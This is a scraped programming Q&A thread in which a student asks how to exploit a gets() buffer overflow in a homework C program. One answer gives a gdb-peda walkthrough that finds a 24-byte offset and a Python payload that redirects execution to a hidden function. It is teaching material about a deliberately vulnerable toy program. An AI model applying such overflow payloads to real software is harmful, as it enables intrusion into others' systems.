CODEWITHSUNDEEP
cbufferoverflowbuffer-overflowexploit
Kaoteni
Kaoteni

Reputation: 49

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.

#include <stdio.h>
#include <stdlib.h>

int oopsIGotToTheBadFunction(void)
{
        printf("Gotcha!\n");
        exit(0);
}

int goodFunctionUserInput(void)
{
        char buf[12];
        gets(buf);
        return(1);
}

int main(void)
{
        goodFunctionUserInput();
        printf("Overflow failed\n");
        return(1);
}

The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!

Update:

I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:

gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp

With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?

Upvotes: 2

Views: 3698

Answers (2)

sinkmanu
sinkmanu

Reputation: 1102

First, you need to find the offset to overwrite the Instruction pointer register (EIP).

Use gdb + peda is very useful:

$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret    
   0x4005c9 <main>: push   rbp
   0x4005ca <main+1>:   mov    rbp,rsp
   0x4005cd <main+4>:   call   0x4005ae <goodFunctionUserInput>
   0x4005d2 <main+9>:   mov    edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....

Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.

Get the function address:

$ readelf -s bof 
   ...
   50: 0000000000400596    24 FUNC    GLOBAL DEFAULT   13 oopsIGotToTheBadFunction 
   ...

Make the exploit and got the results:

[manu@debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu@debian /tmp]$ ./bof < input
Gotcha!

Upvotes: 0

John Doe
John Doe

Reputation: 403

Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.

Upvotes: 1

Related Questions